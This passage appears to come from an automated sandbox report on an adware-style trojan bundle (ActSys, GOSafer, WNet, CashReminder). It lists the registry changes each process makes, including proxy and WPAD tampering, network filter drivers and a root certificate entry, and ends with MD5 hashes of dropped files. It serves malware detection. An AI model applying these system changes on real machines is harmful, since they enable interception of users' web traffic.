"Comments" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices! (Build: EZbBN9f90YpDduoIMPstB7W)"
[HKLM\SOFTWARE\Wow6432Node\CashReminder]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayVersion" = "1.0.0"
"QuietUninstallString" = "%Program Files% (x86)\CashReminder\uninstall.exe /S"
The process ActSys.exe:3756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "22 FE 3B 6A 9A 83 D0 01"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\System\CurrentControlSet\Services\asfilterdrv]
"Tag" = "19"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\527254500A2C2998BD4D09D9989A7F3E76405E07]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 52 72 54 50"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "12 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionTime" = "BE 7F E7 6B 9A 83 D0 01"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\ActSys]
"instid" = "RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"527254500A2C2998BD4D09D9989A7F3E76405E07"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "2C 3C 44 64 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 48 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process amisetup2899__9664.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1430290658"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"(Default)" = "{1CEE7E9E-B36C-4404-8341-EACC6687DA52}"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionTime" = "33 5F AA 66 9A 83 D0 01"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"(Default)" = "{1CEE7E9E-B36C-4404-8341-EACC6687DA52}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Version]
"(Default)" = "1.0"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0]
"(Default)" = "InstallerLib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "2C 3C 44 64 9A 83 D0 01"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}]
"(Default)" = "Inst Class"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\ProgID]
"(Default)" = "scalawag.wuther.1"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup2899__9664.exe"
[HKCR\scalawag.wuther\CurVer]
"(Default)" = "scalawag.wuther.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\TypeLib]
"(Default)" = "{1cee7e9e-b36c-4404-8341-eacc6687da52}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 49 00 00 00 09 00 00 00 00 00 00 00"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
"(Default)" = "IBoot"
[HKCR\scalawag.wuther.1\CLSID]
"(Default)" = "{c8c02f46-c416-4092-a52c-abb5232cb4b9}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKCR\scalawag.wuther]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
"(Default)" = "IBoot"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\VersionIndependentProgID]
"(Default)" = "scalawag.wuther"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"Version" = "1.0"
[HKCR\scalawag.wuther.1]
"(Default)" = "Inst Class"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Version]
[HKCR\scalawag.wuther\CurVer]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\VersionIndependentProgID]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\FLAGS]
[HKCR\scalawag.wuther.1\CLSID]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0\win32]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Programmable]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\TypeLib]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
[HKCR\scalawag.wuther.1]
[HKCR\scalawag.wuther]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\HELPDIR]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\ProgID]
The Trojan deletes the following value(s) in system registry:
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"ServerExecutable"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process GOSafer.exe:3284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKLM\System\CurrentControlSet\Services\gosaferdrv]
"Tag" = "17"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "21 B7 48 6B 9A 83 D0 01"
[HKLM\SOFTWARE\GOSafer]
"instid" = "OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "10 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process WNet.exe:3080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\ssfilterdrv]
"Tag" = "13"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "22 FE 3B 6A 9A 83 D0 01"
[HKLM\SOFTWARE\WNet]
"instid" = "XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0C 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process 310714_is.exe:948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer]
"GlobalAssocChangedCounter" = "35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
| MD5 | File path |
|---|---|
| cd594b7e64bbb60804076c1434a1ec09 | c:\Program Files (x86)\ActSys\ActSys.exe |
| d6f19bc6d4f54dfae1a4d4b96d12f1c1 | c:\Program Files (x86)\ActSys\ProtocolFilters.dll |
| bec584303ce252396a3731ce5bdcf03a | c:\Program Files (x86)\ActSys\libeay32.dll |
| d8305b5c2810e2e135f87bb32d62810e | c:\Program Files (x86)\ActSys\nfapi.dll |
| 01b5780505301ada6dc102fb77b2298c | c:\Program Files (x86)\ActSys\nfregdrv.exe |
| f40cddc932f47b3e406d0c4fde03dfd8 | c:\Program Files (x86)\ActSys\remove_ActSys.exe |
